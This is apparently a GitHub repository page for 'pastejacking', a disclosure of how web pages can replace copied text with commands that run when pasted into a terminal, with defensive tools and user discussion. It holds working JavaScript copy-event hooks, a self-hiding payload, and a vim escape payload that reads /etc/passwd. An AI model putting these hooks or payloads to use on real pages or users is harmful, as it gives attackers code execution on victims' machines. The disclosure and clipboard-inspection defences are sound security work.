
pastejacking's Introduction

Pastejacking

Browsers allow a web page to write to the user's clipboard, but only from a handler for a user-initiated browser event (for example copy, keydown or a click). This post details how that can be abused to trick a user into running commands they never intended to run, and so gain code execution.

It should also be noted that similar attacks have been possible for some time using only HTML/CSS (hiding text inside what the user selects). What is different here is that the clipboard text can be replaced after an event fires, it can be replaced on a short timer following an event, and it is easier to put arbitrary bytes such as control characters into the clipboard, which can be used to exploit vim, all shown below.

Demo

Here is a demo of a website that entices a user to copy an innocent looking command https://security.love/Pastejacking

This demo uses JavaScript to hook the copy event, which fires on ctrl+c or right-click copy. Right now it works in Chrome, Firefox, and Safari but not in Internet Explorer; a second demo below is IE compatible.

echo "not evil"

Will be replaced with

echo "evil"\r\n

Note the newline appended to the end of the line. When the user pastes the echo command into their terminal, the shell executes it immediately and "evil" is echoed to the screen, without giving the user a chance to review the command before it runs.

The second demo hooks the keydown event instead: when the user presses a keyboard shortcut such as ctrl+c or command+c, an 800ms timer is set that then overwrites the user's clipboard with malicious code. This variant works in Chrome, Firefox, and Internet Explorer, but is not compatible with Safari.

More sophisticated payloads can also hide themselves, such as the one demoed here and shown below:

touch ~/.evil
clear
echo "not evil"

This payload creates a file in your home directory and then clears the terminal. To the victim it looks as though the command they intended to copy was pasted cleanly into the terminal.
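The copy-event form of the attack, with a self-hiding payload like the one above, as an added example that is not the repository's own demo code. In a browser only `buildHiddenPayload`, `hijackCopy` and `installHook(document, payload)` are needed; the `fakeClipboardEvent` stand-in is constructed here so the logic can be exercised outside a browser.

```javascript
// Added example (not the pastejacking repository's demo code).

// Build a payload that runs hidden commands, clears the terminal, then echoes
// the text the victim believes they copied. The trailing "\n" makes a shell
// run everything immediately on paste instead of waiting for Enter.
function buildHiddenPayload(visibleCommand, hiddenCommands) {
  return hiddenCommands.concat(['clear', visibleCommand]).join('\n') + '\n';
}

function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Handler for the "copy" event. Replaces whatever the user selected with the
// attacker's payload. preventDefault() is required: without it the browser
// writes the user's real selection and discards the setData() calls.
function hijackCopy(event, payload) {
  event.clipboardData.setData('text/plain', payload);
  // Rich-text targets get the same payload as HTML so the substitution also
  // survives a paste into an HTML-aware editor.
  event.clipboardData.setData('text/html', '<pre>' + escapeHtml(payload) + '</pre>');
  event.preventDefault();
  return payload;
}

// Real usage on a page: installHook(document, payload). Nothing else is needed;
// the hook fires on ctrl+c / command+c and on right-click copy.
function installHook(doc, payload) {
  doc.addEventListener('copy', function (e) { hijackCopy(e, payload); });
}

// Constructed stand-in for a browser ClipboardEvent (assumption: only the
// setData/getData/preventDefault surface used above is modelled).
function fakeClipboardEvent(selectedText) {
  const data = { 'text/plain': selectedText };
  return {
    defaultPrevented: false,
    clipboardData: {
      setData(type, value) { data[type] = value; },
      getData(type) { return data[type] || ''; },
    },
    preventDefault() { this.defaultPrevented = true; },
  };
}

// Simulate the victim selecting the innocent command and pressing ctrl+c.
function demo() {
  const payload = buildHiddenPayload('echo "not evil"', ['touch ~/.evil']);
  const ev = fakeClipboardEvent('echo "not evil"');
  hijackCopy(ev, payload);
  return {
    prevented: ev.defaultPrevented,
    clipboard: ev.clipboardData.getData('text/plain'),
  };
}
```

The page the victim looks at still shows only `echo "not evil"`; the substitution happens entirely inside the copy handler, so nothing visible changes until the paste.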

Impact

This method can be combined with phishing to entice users into running seemingly innocent commands. The malicious code overrides the innocent code, and the attacker gains remote code execution on the user's host as soon as the user pastes the contents into a terminal.

How do you protect yourself?

This is not so straightforward. One option is to verify the contents of your clipboard before pasting into a terminal, but be careful where you verify them. For example, if you paste into vim, the payload can contain vim key sequences that run arbitrary commands. An example of this can be seen in this demo and below:

copyTextToClipboard('echo "evil"\n \x1b:!cat /etc/passwd\n');

This payload echoes "evil" when pasted into a terminal, and cats the user's /etc/passwd when pasted into vim: the ESC byte (\x1b) leaves insert mode, and `:!cat /etc/passwd` followed by a newline runs a shell command.

One solution around this can be seen below

"+p       -- within vim (normal mode), pastes the clipboard register as text without interpreting it as vim keystrokes
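A clipboard inspector for the checks described in this section, as an added example that is not part of the original post. It renders control characters visibly, the way `cat -A` does, and flags the tricks shown above: a trailing newline that auto-executes in a shell, extra lines hidden behind `clear`, and ESC (0x1b) sequences aimed at vim. It assumes you can get the raw clipboard text into a string (for example from `xclip -selection clipboard -o`, or `navigator.clipboard.readText()` in a page); the sample inputs are the payloads from this page.

```javascript
// Added example (not part of the original post).

// Show every byte: ESC as ^[, other C0 controls as ^X, CR as ^M, tab as ^I,
// and a "$" at the end of each line so a trailing newline is visible.
function visualize(text) {
  let out = '';
  for (const ch of text) {
    const code = ch.codePointAt(0);
    if (ch === '\n') out += '$\n';
    else if (ch === '\t') out += '^I';
    else if (code < 0x20) out += '^' + String.fromCharCode(code + 0x40);
    else if (code === 0x7f) out += '^?';
    else if (code > 0x7e) out += '\\u{' + code.toString(16) + '}';
    else out += ch;
  }
  return out;
}

// Return the list of reasons a paste would be unsafe. An empty list means
// nothing suspicious was found, which is not proof of safety. `expected` is
// the command as displayed on the page, if you want to compare against it.
function inspectClipboard(text, expected) {
  const findings = [];
  if (text.endsWith('\n') || text.endsWith('\r')) {
    findings.push('ends with a newline: a shell executes it on paste');
  }
  const lines = text.replace(/\r\n?/g, '\n').split('\n').filter(l => l.length);
  if (lines.length > 1) {
    findings.push('contains ' + lines.length + ' commands, not one');
  }
  if (lines.some(l => /^\s*(clear|reset|tput\s+clear)\s*$/.test(l))) {
    findings.push('clears the terminal, hiding earlier output');
  }
  if (text.includes('\x1b')) {
    findings.push('contains ESC (0x1b): vim or terminal escape sequence');
  }
  // Remaining C0 controls except tab, LF, CR and ESC, plus DEL.
  if (/[\x00-\x08\x0b\x0c\x0e-\x1a\x1c-\x1f\x7f]/.test(text)) {
    findings.push('contains other control characters');
  }
  if (/[\u200b-\u200f\u2028\u2029\u202a-\u202e\u2060\ufeff]/.test(text)) {
    findings.push('contains zero-width or bidi characters');
  }
  if (expected !== undefined && text.trim() !== expected.trim()) {
    findings.push('differs from the text shown on the page');
  }
  return findings;
}

// Constructed sample inputs: the vim payload and the self-hiding payload
// from this page, and the innocent command the victim thinks they copied.
const SAMPLES = {
  vim: 'echo "evil"\n \x1b:!cat /etc/passwd\n',
  hidden: 'touch ~/.evil\nclear\necho "not evil"\n',
  innocent: 'echo "not evil"',
};

function report(name) {
  const text = SAMPLES[name];
  return { shown: visualize(text), findings: inspectClipboard(text, 'echo "not evil"') };
}
```

Run `report('vim')` to see the escape byte rendered as `^[` and the trailing `$`; compare this with how a terminal would render the same bytes (invisibly), which is why pasting into the terminal itself is not a check.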

If you're running iTerm, you get a warning when the pasted text ends with a newline, as seen here:

(screenshot: iTerm's paste warning)

Of course, it goes without saying: take note of the source you're pasting from, and exercise additional caution when pasting from questionable sources.

pastejacking's People

Contributors

davidthornton, dxa4481, petasittek, shaneoh


pastejacking's Issues

Is it safe to just use `cat` or $(cat)?

Like, you paste into cat, and if you reviewed and want to execute you can just press ctrl-D, and if you don't want to execute then just press ctrl-C.

Is there any character that could cause ctrl-D to be pressed, or is there other forms of attack against this method?

I have noscript installed

With NoScript installed I don't have to worry about hidden scripts running in the background. This isn't an issue, just a comment for everyone to install this plugin.
NoScript.net

Suggestion: use X(org) selection on *nix

With X(org) on *nix systems it is common to copy text simply by selecting it and pasting it via middle click. It seems like this procedure is not affected by pastejacking.

Is this assumption correct or are there simply no attempts to cover this yet?

Real world concerns and weaponizing

So I totally understand how this exploit works, but I'm curious who we think the target audience is and how well could one actually weaponize such an exploit. To me it seems like a pretty big stretch to get a high value target to copy and paste code off of an untrusted website and into a shell, but I'm open to other opinions and ideas.

First off, this exploit is easily defeated by pasting your clipboard into a benign text editor such as Sublime Text or Notepad. Nothing new here, but if this exploit does start to become a serious problem then I would assume this easy procedure would protect people 100% of the time.

But more interesting to me is the intended targets. It sounds to me like students, web hobbyists, perhaps a rushed dev-ops engineer would be the most likely phishing target. I just can't think of that many users who use the terminal and aren't power users. It's not like MS Word or Photoshop is gonna execute the hidden commands if a user pastes this message into them. But maybe I'm being naive, as we are all becoming more and more computer proficient and maybe more people are using the terminal.

I'm curious to hear any responses or thoughts about this, and thanks again for making the effort to publish this exploit and bring more attention to it.

Just use copy event

This currently relies on keydown, but as it turns out you can just do the following

document.addEventListener('copy', function(e){
    e.clipboardData.setData('text/plain', 'Hello, world!');
    e.clipboardData.setData('text/html', '<b>Hello, world!</b>');
    e.preventDefault(); // We want our data, not data from any selection, to be written to the clipboard
});

I'll be adding this soon!

Easier solution: Use ZSH

I think it should be mentioned that this doesn't work with zsh, as it only executes commands when the user presses enter, not when pasting a newline.

Possible solution?

While pasting text in gedit can be used to verify commands, what about a bash command?

I made a bash function that shows the clipboard safely and gives you the option to execute it after reviewing. You don't need to open any other programs like gedit (and it also prevents vim scripts), and it can be used on servers (ssh) without a GUI.

It needs xclip to be installed. cat is used to display the clipboard and will also show special characters. (pp is for paste protection, and it is fast to type.)

function pp {
    # -selection clipboard reads the CLIPBOARD buffer that ctrl+c writes to;
    # plain `xclip -o` reads the PRIMARY (mouse-selection) buffer instead.
    xclip -selection clipboard -o | cat -A
    echo -ne "\nExecute? (y/n): "
    read execute
    # only execute when 'y' was answered
    # all other input is ignored
    if [[ $execute == "y" ]]; then
        eval "$(xclip -selection clipboard -o)"
    fi
}

Example from the demo:

aaron@aaron-pc:~$ pp
echo "evil"$

Execute? (y/n): n
aaron@aaron-pc:~$
aaron@aaron-pc:~$ pp
echo "evil"$

Execute? (y/n): y
evil
aaron@aaron-pc:~$ 

Has this been exploited in the wild?

Has anyone found any evidence of this (or the old issue) being used in the wild? I absolutely think that it's a relevant issue, just thought it would be interesting to know if it has been used maliciously.

(I know this technically isn't the correct place to post something like this but I felt like it was the best alternative.)
